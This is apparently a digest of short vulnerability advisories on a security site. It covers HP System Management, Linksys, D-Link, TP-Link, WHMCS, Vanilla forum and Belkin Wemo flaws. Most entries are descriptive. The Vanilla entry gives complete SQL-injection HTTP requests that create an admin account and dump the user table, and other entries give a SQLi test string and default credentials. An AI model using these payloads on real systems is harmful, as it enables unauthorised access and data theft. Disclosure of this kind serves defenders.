This module exploits an anonymous remote code execution on HP System Management 7.1.1 and earlier. The vulnerability exists when handling the iprange parameter on a request against /proxy/DataValidation. In order to work HP System Management must be configured with Anonymous access enabled.
Some Linksys Routers are vulnerable to an authenticated OS command injection. Default credentials for the web interface are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes.
We have found a SQL injection inside the group pay plugin for WHCMS. A lot of game hosting companies are using this plugin. SQL Injection is in the function gp_LoadUserFromHash. Exploits can be done by using the grouppay.php?hash=%hash%' and '1'='1
Login runs 'cat' before dropping privileges which is easy to exploit, given that the file permissions don't work. Just log in as 'local', and replace the 'cat' binary with another ELF - 'whoami' will do nicely for a PoC. Then log out, and back in again. This causes your binary to run as uid 0. Abuse syscall_fstat() to write the contents of the stat buf to an arbitrary kernel location if you so wish. There are a few other similar bugs where pointers aren't sanitised, too.
Cyberoam Threat Research Team discovered a Local Buffer Overflow vulnerability in Groovy Media Player 3.2.0. The software performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer. Exploiting this issue may allow attackers to execute arbitrary code in the context of the application.
Versions of HP System Management Homepage <= 7.1.2 include a setuid root smhstart which is vulnerable to a local buffer overflow in SSL_SHARE_BASE_DIR env variable.
TP-Link TD-8817 is a ADSL2+ Ethernet/USB Modem Router which works with a 24-Mbps downstream connection. You can easily change the default user's (admin) password by the default router page listning on tcp/ip port 80. In here you the $_GET will change the password for you and the $_POST request method is not needed for changing the router pass. Save this as csrf.html and this will change the router password to blank if the current user admin visits this page his password will be resetted to blank. You can login with the username admin and password (blank).
SQL-Injection is possible, because$_POST arrays are not properly sanitized. To insert an arbitrary user, a sample HTTP-Post Request looks as follows: POST /[PATH]/vanilla/entry/signin HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: [any cookie] Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 399 Form%2FTransientKey=VQYSOG2F3D38&Form%2Fhpt=&Form%2FTarget=discussions& Form%2FClientHour=2013-3-28+11%3A37&Form%2FEmail['admin';INSERT INTO gdn_user (UserID, Name, Password, HashMethod, DateInserted, Admin, Permissions) VALUES (NULL, '1234', '$P$BayO4QrMb9wgzdjNhlUBWdQcVaMnKN0', 'Vanilla', '2013-03-28 00:00:00', '1', '');#]=abcd&Form%2FPassword=*&Form%2FSign_In= Sign+In&Checkboxes%5B%5D=RememberMe Indeed you has to take care of the proper encryption algorithm which is currently used. As it is not possible to get the user table displayed on the website, you could establish an attack as follows: POST /[PATH]/vanilla/entry/passwordrequest HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 399 Form%2FTransientKey=VQYSOG2F3D38&Form%2Fhpt=&Form%2FTarget=discussions& Form%2FClientHour=2013-3-28+11%3A37&Form%2FEmail['admin';SELECT * FROM gdn_user;#]=abcd&Form%2FPassword=*&Form%2FSign_In= Sign+In&Checkboxes%5B%5D=RememberMe
The vulnerability is caused by missing input validation in the dst parameter and missing session validation and can be exploited to inject and execute arbitrary shell commands. WARNING: You do not need to be authenticated to the device to insert and execute malicious commands. Hint: On different devices like the DIR-645 wget is preinstalled and you are able to upload and execute your malicious code.
An arbitrary firmware vulnerability exists in Belkin Wemo devices prior to WeMo_US_2.00.2176.PVT. An attacker can send a malicious SOAP request to the device to update the firmware with a malicious version, allowing for remote code execution.
Services By CQR